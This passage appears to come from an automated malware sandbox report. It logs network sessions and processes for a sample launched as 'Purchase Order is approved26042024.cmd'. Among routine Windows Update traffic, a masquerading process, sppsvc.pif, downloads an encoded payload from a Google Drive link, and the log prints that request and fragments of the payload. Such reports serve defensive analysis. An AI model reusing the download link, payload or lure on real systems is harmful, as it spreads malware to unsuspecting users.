                                                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.54972140.127.169.103443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:14 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                  2024-04-26 19:56:14 UTC560INHTTP/1.1 200 OK
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Expires: -1
                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                  MS-CorrelationId: 4f9974b6-7202-4fe9-ad3c-6e4f4ca9e81c
                                                                                                                  MS-RequestId: b684c58f-6411-452a-92f7-6f61221f83d6
                                                                                                                  MS-CV: NuuznHB8kUqzE651.0
                                                                                                                  X-Microsoft-SLSClientCache: 2880
                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:13 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 24490
                                                                                                                  2024-04-26 19:56:14 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                  2024-04-26 19:56:14 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.549729142.250.217.1934435228C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:19 UTC223OUTGET /download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=download HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                  2024-04-26 19:56:20 UTC4813INHTTP/1.1 200 OK
                                                                                                                  X-GUploader-UploadID: ABPtcPrPJhsQYhTR6i4uc3Eplk-8Fu2KFjDQRABdg9TsIWIGY_cz4Nts0GIvAOV_782Qm3bltNSyUu9QMQ
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Content-Disposition: attachment; filename="255_Kpeyvrohotl"
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Dom [TRUNCATED]
                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Length: 1118336
                                                                                                                  Last-Modified: Fri, 26 Apr 2024 13:05:15 GMT
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:20 GMT
                                                                                                                  Expires: Fri, 26 Apr 2024 19:56:20 GMT
                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                  X-Goog-Hash: crc32c=THHw3g==
                                                                                                                  Server: UploadServer
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2024-04-26 19:56:20 UTC4813INData Raw: 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 45 56 6c 68 46 52 45 4a 68 4b 7a 41 73 4a 79 63 73 4b 6a 51 31 4b 44 4d 36 4f 79 38 7a 4f 6a 73 79 4e 44 59 76 4d 69 63 79 4b 7a 73 74 4e 43 59 72 4b 79 68 4c 53 55 70 47 59 56 59 63 46 30 4a 68 52 47 67 69 49 68 64 68 52 45 56 47 49 55 64 4c 53 55 6f 69 49 6b 52 68 52 55 52 57 57 45 56 45 51 6d 46 73 4d 79 67 38 4f 54 55 79 4b 7a 49 33 4c 30 74 4a 53 6b 5a 68 56 68 77 58 51 6d 46 45 61 43 49 69 46 32 46 45 52 55 59 68 52 30 74 4a 53 69 49 69 52 47 46 46 52 46 5a 59 52 55 52 43 59 61 79 78 72 61 69 6f 72 61 65 56 6b 71 6d 73 66 4e 39 53 31 32 6f 38 4d 4e 58 35 66 44 71 66 42 52 46 47 70 69 6c 69 2f 30 34 4c 46 78 53 71 70 36 63 58 6a 2f 49
                                                                                                                  Data Ascii: S0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUVEVlhFREJhKzAsJycsKjQ1KDM6Oy8zOjsyNDYvMicyKzstNCYrKyhLSUpGYVYcF0JhRGgiIhdhREVGIUdLSUoiIkRhRURWWEVEQmFsMyg8OTUyKzI3L0tJSkZhVhwXQmFEaCIiF2FERUYhR0tJSiIiRGFFRFZYRURCYayxraioraeVkqmsfN9S12o8MNX5fDqfBRFGpili/04LFxSqp6cXj/I
                                                                                                                  2024-04-26 19:56:20 UTC4813INData Raw: 6c 64 46 4e 55 67 6c 55 7a 46 52 4e 31 6b 61 55 57 56 5a 52 31 4a 54 54 51 68 46 45 45 6b 44 53 32 52 45 59 30 6c 6f 53 61 6c 4b 71 41 32 56 43 71 58 2f 6b 51 46 33 2b 58 67 42 68 2f 6e 6e 41 4e 4d 46 31 77 33 66 43 62 51 48 74 51 36 30 43 62 6b 4a 57 41 68 58 44 54 55 4b 4a 66 38 78 41 54 66 35 47 67 46 6c 2b 55 63 41 55 77 55 49 44 52 41 4a 41 77 64 6b 44 6d 4d 4a 61 41 6d 70 43 4b 67 4d 6c 51 75 6c 2f 70 45 41 64 2f 68 34 41 49 66 34 35 77 48 54 42 4e 63 4d 33 77 69 30 42 72 55 50 74 41 69 35 43 46 67 4a 56 77 77 31 43 79 58 2b 4d 51 41 33 2b 42 6f 41 5a 66 68 48 41 56 4d 45 43 41 77 51 43 41 4d 47 5a 41 39 6a 43 47 67 49 71 51 6d 6f 43 35 55 4d 70 51 47 52 2f 33 66 33 65 50 2b 48 39 2b 66 2b 30 77 50 58 43 39 38 48 74 41 6d 31 45 4c 51 48 75 51 64 59
                                                                                                                  Data Ascii: ldFNUglUzFRN1kaUWVZR1JTTQhFEEkDS2REY0loSalKqA2VCqX/kQF3+XgBh/nnANMF1w3fCbQHtQ60CbkJWAhXDTUKJf8xATf5GgFl+UcAUwUIDRAJAwdkDmMJaAmpCKgMlQul/pEAd/h4AIf45wHTBNcM3wi0BrUPtAi5CFgJVww1CyX+MQA3+BoAZfhHAVMECAwQCAMGZA9jCGgIqQmoC5UMpQGR/3f3eP+H9+f+0wPXC98HtAm1ELQHuQdY
                                                                                                                  2024-04-26 19:56:20 UTC261INData Raw: 4f 78 61 36 6d 73 73 55 71 53 43 78 45 4d 45 51 48 31 2f 78 76 33 5a 66 31 6b 39 57 6e 38 6d 41 69 65 45 4a 41 45 32 51 49 65 42 67 6f 51 6d 52 43 50 45 65 77 45 31 77 4f 39 39 72 2f 34 51 67 41 38 2b 44 63 41 45 76 6b 41 44 50 59 45 5a 67 2b 51 45 64 55 49 50 67 38 73 44 2f 51 4f 62 77 4b 44 42 59 2f 34 79 76 61 35 2f 6a 4c 32 57 50 34 4c 39 77 49 52 6c 77 6d 67 44 58 51 4c 75 77 4c 4c 44 54 41 4e 58 67 77 50 43 51 30 47 6e 66 4f 70 39 48 54 38 66 66 54 68 2f 46 6a 31 50 37 43 76 71 44 4f 73 6f 61 71 56 52 43 4a 4a 39 41 6d 59 43 49 38 4e 65 67 72 62 2f 31 41 41 52 50 67 6c 41 44 6e 34 48 67 46 58 42 4b 77 4c 6d 51 65 72 43 58 30 51 6a 51 63 6c 42 78 51 47 43 67 74 77 44 61 63 41 37 76 37 45 39 6b 48 2b 4e 2f 59 5a 2f 30 51 4a 50 52 45 69 41 79 59 46 47
                                                                                                                  Data Ascii: Oxa6mssUqSCxEMEQH1/xv3Zf1k9Wn8mAieEJAE2QIeBgoQmRCPEewE1wO99r/4QgA8+DcAEvkADPYEZg+QEdUIPg8sD/QObwKDBY/4yva5/jL2WP4L9wIRlwmgDXQLuwLLDTANXgwPCQ0GnfOp9HT8ffTh/Fj1P7CvqDOsoaqVRCJJ9AmYCI8Negrb/1AARPglADn4HgFXBKwLmQerCX0QjQclBxQGCgtwDacA7v7E9kH+N/YZ/0QJPREiAyYFG
                                                                                                                  2024-04-26 19:56:20 UTC1255INData Raw: 43 43 77 50 36 44 6d 63 43 69 2f 66 77 2b 65 49 42 79 2f 6e 39 41 48 62 35 59 67 78 6d 42 4b 55 50 70 52 47 42 43 49 30 50 79 41 39 55 44 6e 45 44 4b 51 51 48 2b 49 4c 32 68 2f 37 65 39 6b 37 2b 4b 76 63 67 43 6d 63 43 62 51 36 59 43 34 38 43 75 77 30 78 44 51 6f 4e 77 67 69 36 42 32 37 79 2b 50 4e 36 2b 34 7a 7a 6b 66 76 75 38 73 49 50 4e 51 64 41 43 32 63 4e 59 77 52 46 43 77 43 73 73 61 33 4d 71 4c 47 58 6c 56 4f 63 41 48 7a 34 67 41 44 50 2b 45 38 42 39 41 54 36 44 47 55 49 48 41 61 56 45 49 49 48 68 67 64 35 42 6e 6b 4c 79 77 78 4c 41 56 54 2f 4a 50 63 6a 2f 31 7a 33 45 66 34 66 41 36 51 4b 6b 77 5a 4e 41 7a 41 4b 49 41 53 4f 42 50 45 46 61 67 55 66 41 76 66 32 35 50 67 39 41 4b 6e 33 2b 2f 38 51 39 67 77 4b 6c 41 6e 71 44 55 30 4c 4f 41 49 58 44 55
                                                                                                                  Data Ascii: CCwP6DmcCi/fw+eIBy/n9AHb5YgxmBKUPpRGBCI0PyA9UDnEDKQQH+IL2h/7e9k7+KvcgCmcCbQ6YC48Cuw0xDQoNwgi6B27y+PN6+4zzkfvu8sIPNQdAC2cNYwRFCwCssa3MqLGXlVOcAHz4gADP+E8B9AT6DGUIHAaVEIIHhgd5BnkLywxLAVT/JPcj/1z3Ef4fA6QKkwZNAzAKIASOBPEFagUfAvf25Pg9AKn3+/8Q9gwKlAnqDU0LOAIXDU
                                                                                                                  2024-04-26 19:56:20 UTC66INData Raw: 44 2f 69 2f 64 2b 2f 75 38 44 34 41 76 4c 42 79 4d 4a 62 42 41 67 42 30 77 48 54 77 62 31 43 36 38 4e 67 67 44 72 2f 74 4c 32 30 76 35 4e 39 69 72 2f 4d 77 49 55 43 68 38 47 2f 77 67 68 45 61 34 46
                                                                                                                  Data Ascii: D/i/d+/u8D4AvLByMJbBAgB0wHTwb1C68NggDr/tL20v5N9ir/MwIUCh8G/wghEa4F
                                                                                                                  2024-04-26 19:56:20 UTC1255INData Raw: 6e 41 57 5a 42 49 30 52 66 41 37 55 2b 38 6e 39 7a 50 57 32 2f 55 76 31 4a 76 78 71 43 51 63 52 44 41 58 36 41 77 59 4b 70 41 53 53 42 4f 67 46 35 42 44 71 44 2b 6e 36 77 66 7a 4a 39 44 33 38 4b 66 51 6d 2f 54 55 49 54 52 44 7a 42 4a 55 43 6d 51 79 72 41 35 55 44 65 51 4c 55 44 31 45 51 52 76 33 33 2b 79 58 7a 47 50 74 62 38 2f 4c 36 43 77 66 38 44 32 55 43 71 51 53 6d 44 58 51 43 63 67 4a 2f 41 2b 4d 4f 77 68 48 51 2f 46 4c 36 43 66 49 36 2b 69 72 79 48 76 74 63 42 76 51 4f 2b 51 49 4e 42 42 73 47 6b 42 48 70 45 64 49 51 33 67 58 47 41 73 50 33 4b 2f 6e 79 41 57 7a 34 71 67 43 58 2b 61 67 4d 68 77 52 35 45 50 41 4f 75 77 65 32 45 46 6b 51 4f 78 46 4a 42 45 34 44 44 76 5a 73 39 33 66 2f 65 50 66 73 2f 39 6e 32 34 67 73 54 41 78 67 50 58 78 45 41 43 41 4d
                                                                                                                  Data Ascii: nAWZBI0RfA7U+8n9zPW2/Uv1JvxqCQcRDAX6AwYKpASSBOgF5BDqD+n6wfzJ9D38KfQm/TUITRDzBJUCmQyrA5UDeQLUD1EQRv33+yXzGPtb8/L6Cwf8D2UCqQSmDXQCcgJ/A+MOwhHQ/FL6CfI6+iryHvtcBvQO+QINBBsGkBHpEdIQ3gXGAsP3K/nyAWz4qgCX+agMhwR5EPAOuwe2EFkQOxFJBE4DDvZs93f/ePfs/9n24gsTAxgPXxEACAM
                                                                                                                  2024-04-26 19:56:20 UTC1255INData Raw: 34 75 67 41 42 2b 50 66 38 6f 67 6e 37 44 35 59 44 4e 77 56 57 44 41 45 43 41 68 46 44 45 59 38 45 67 51 4f 30 39 6a 54 31 6b 50 32 32 39 54 4c 39 48 76 52 5a 45 55 6f 49 65 67 77 57 44 56 75 6a 72 4b 78 46 72 4b 32 74 71 45 57 7a 53 4d 52 54 4d 77 45 78 2b 52 63 42 39 2f 6e 32 41 41 63 45 31 77 76 6a 42 38 67 43 55 51 73 52 44 64 34 4e 63 41 71 49 42 39 63 49 30 4a 4b 70 6c 41 79 63 71 36 53 58 6e 4b 39 53 66 45 33 6b 52 54 31 4a 5a 41 49 64 44 4e 49 44 4a 51 4d 78 41 68 34 50 46 52 42 6e 2f 52 6e 37 57 2f 4e 47 2b 31 50 7a 54 2f 6f 41 42 77 67 50 59 68 41 2f 45 4a 6d 6a 72 4b 77 43 72 4b 71 4e 71 4b 69 74 41 76 37 33 44 76 6e 30 41 51 2f 35 44 41 48 34 2b 41 67 4e 49 41 53 37 45 42 6b 4f 48 67 64 76 45 47 67 51 70 52 47 77 42 4c 45 44 6c 66 6b 31 39 71
                                                                                                                  Data Ascii: 4ugAB+Pf8ogn7D5YDNwVWDAECAhFDEY8EgQO09jT1kP229TL9HvRZEUoIegwWDVujrKxFrK2tqEWzSMRTMwEx+RcB9/n2AAcE1wvjB8gCUQsRDd4NcAqIB9cI0JKplAycq6SXnK9SfE3kRT1JZAIdDNIDJQMxAh4PFRBn/Rn7W/NG+1PzT/oABwgPYhA/EJmjrKwCrKqNqKitAv73Dvn0AQ/5DAH4+AgNIAS7EBkOHgdvEGgQpRGwBLEDlfk19q
                                                                                                                  2024-04-26 19:56:20 UTC1255INData Raw: 6f 4e 2f 41 51 50 43 77 63 4c 2b 51 72 79 42 32 63 49 48 76 56 69 38 35 76 37 70 76 4f 57 6e 4b 2b 55 48 4c 43 73 4b 71 2b 73 6e 45 75 75 52 4b 46 4a 6c 6b 6d 44 53 6f 52 46 69 30 69 4e 55 33 4a 52 32 6c 6e 6d 55 64 5a 5a 30 31 4c 74 54 64 39 46 78 55 6e 42 53 37 4a 45 74 55 6d 79 53 62 39 4b 58 30 56 65 53 44 46 54 63 56 45 6d 57 53 56 52 63 56 6b 76 55 6d 39 4e 47 30 55 53 53 56 4e 4c 56 6b 51 49 53 51 39 4a 45 45 72 37 52 51 42 49 5a 46 4e 70 55 52 4e 5a 62 6c 47 65 57 61 73 41 6c 51 57 58 44 5a 30 4a 65 51 64 36 44 6f 30 4a 65 67 6c 33 43 48 67 4e 35 77 72 5a 2f 2b 59 42 37 76 6e 62 41 62 72 35 78 77 43 35 42 62 4d 4e 75 51 6e 4e 42 30 30 4f 59 41 6c 56 43 54 4d 49 4e 67 30 38 43 6a 76 2f 4b 51 43 73 2b 47 76 2f 54 76 64 4c 2f 76 30 44 45 41 76 32 42
                                                                                                                  Data Ascii: oN/AQPCwcL+QryB2cIHvVi85v7pvOWnK+UHLCsKq+snEuuRKFJlkmDSoRFi0iNU3JR2lnmUdZZ01LtTd9FxUnBS7JEtUmySb9KX0VeSDFTcVEmWSVRcVkvUm9NG0USSVNLVkQISQ9JEEr7RQBIZFNpURNZblGeWasAlQWXDZ0JeQd6Do0Jegl3CHgN5wrZ/+YB7vnbAbr5xwC5BbMNuQnNB00OYAlVCTMINg08Cjv/KQCs+Gv/TvdL/v0DEAv2B
                                                                                                                  2024-04-26 19:56:20 UTC1255INData Raw: 69 66 37 4e 2f 30 39 39 53 6a 39 4e 66 55 64 2f 50 38 4a 39 52 48 2f 42 52 51 43 72 67 75 49 42 48 77 45 64 77 58 73 45 4f 38 50 37 66 72 58 2f 4c 50 30 4f 2f 78 74 39 45 33 39 43 77 6a 2b 45 47 67 45 48 41 4b 64 44 49 6f 44 64 51 50 6b 41 75 34 50 36 68 44 74 2f 56 54 37 4c 66 4d 39 2b 2f 33 7a 44 50 6f 65 42 70 55 4f 68 71 79 63 71 69 57 6a 72 6c 75 70 72 4c 45 46 2b 52 42 6c 44 78 50 36 73 66 75 71 38 35 62 37 71 66 4e 7a 2b 74 38 48 36 67 2f 57 41 2b 34 46 75 51 79 35 41 37 51 44 57 51 49 31 44 79 6b 51 4e 66 30 63 2b 31 7a 7a 53 76 76 38 38 2f 62 36 49 67 64 72 44 36 67 44 6e 41 53 6e 44 59 63 43 67 67 4b 41 41 78 67 4f 62 68 47 5a 39 35 6a 35 64 51 48 65 2b 62 63 42 77 50 67 78 44 66 59 46 59 52 45 63 44 72 45 48 69 52 44 52 45 4c 59 52 58 51 52 41
                                                                                                                  Data Ascii: if7N/099Sj9NfUd/P8J9RH/BRQCrguIBHwEdwXsEO8P7frX/LP0O/xt9E39Cwj+EGgEHAKdDIoDdQPkAu4P6hDt/VT7LfM9+/3zDPoeBpUOhqycqiWjrluprLEF+RBlDxP6sfuq85b7qfNz+t8H6g/WA+4FuQy5A7QDWQI1DykQNf0c+1zzSvv88/b6IgdrD6gDnASnDYcCggKAAxgObhGZ95j5dQHe+bcBwPgxDfYFYREcDrEHiRDRELYRXQRA
                                                                                                                  2024-04-26 19:56:20 UTC1255INData Raw: 43 6a 77 43 49 67 32 71 43 34 51 43 33 77 31 42 44 53 6f 4d 44 41 6b 52 42 67 7a 7a 59 2f 57 64 2f 4a 66 30 68 66 7a 6c 39 66 41 51 7a 51 67 36 44 44 73 4b 45 41 4e 68 43 35 6f 4c 31 67 72 45 42 79 67 49 58 50 55 4f 38 36 43 63 73 4a 56 70 6e 4b 37 56 6b 37 43 76 52 5a 4e 4a 64 30 75 45 52 4f 5a 4a 33 41 6c 75 43 4b 38 4d 69 41 74 7a 2f 74 51 41 4d 2f 68 64 2f 68 4c 32 4e 76 39 41 41 68 63 4b 59 41 5a 63 43 41 34 52 2f 67 5a 75 42 61 38 45 6f 42 48 6f 44 75 2f 37 59 2f 7a 69 39 4d 6e 38 74 76 52 53 2b 75 6f 48 43 51 2f 2b 41 78 51 45 34 51 33 42 41 69 63 43 52 78 44 65 42 62 59 43 59 2f 63 53 2b 51 77 41 68 76 69 48 41 41 50 35 38 77 77 68 42 4b 51 50 70 68 46 34 43 48 6b 50 66 77 39 2b 44 76 45 44 31 67 54 6d 2b 63 7a 33 78 2f 38 58 39 79 44 2b 64 2f 66
                                                                                                                  Data Ascii: CjwCIg2qC4QC3w1BDSoMDAkRBgzzY/Wd/Jf0hfzl9fAQzQg6DDsKEANhC5oL1grEBygIXPUO86CcsJVpnK7Vk7CvRZNJd0uEROZJ3AluCK8MiAtz/tQAM/hd/hL2Nv9AAhcKYAZcCA4R/gZuBa8EoBHoDu/7Y/zi9Mn8tvRS+uoHCQ/+AxQE4Q3BAicCRxDeBbYCY/cS+QwAhviHAAP58wwhBKQPphF4CHkPfw9+DvED1gTm+cz3x/8X9yD+d/f


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  11192.168.2.54973240.127.169.103443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:56 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                  2024-04-26 19:56:57 UTC560INHTTP/1.1 200 OK
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Expires: -1
                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                  ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                  MS-CorrelationId: 1396d6b2-b729-4e36-924b-d4d9bb8930cd
                                                                                                                  MS-RequestId: 9727b9c5-3edc-4e4b-9f78-a33fb903f0c9
                                                                                                                  MS-CV: LExsCG7ko0WtqBHn.0
                                                                                                                  X-Microsoft-SLSClientCache: 2160
                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:56 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 25457
                                                                                                                  2024-04-26 19:56:57 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                  Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                  2024-04-26 19:56:57 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                  Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:21:55:53
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "
                                                                                                                  Imagebase:0x7ff60e400000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:21:55:53
                                                                                                                  Start date:26/04/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
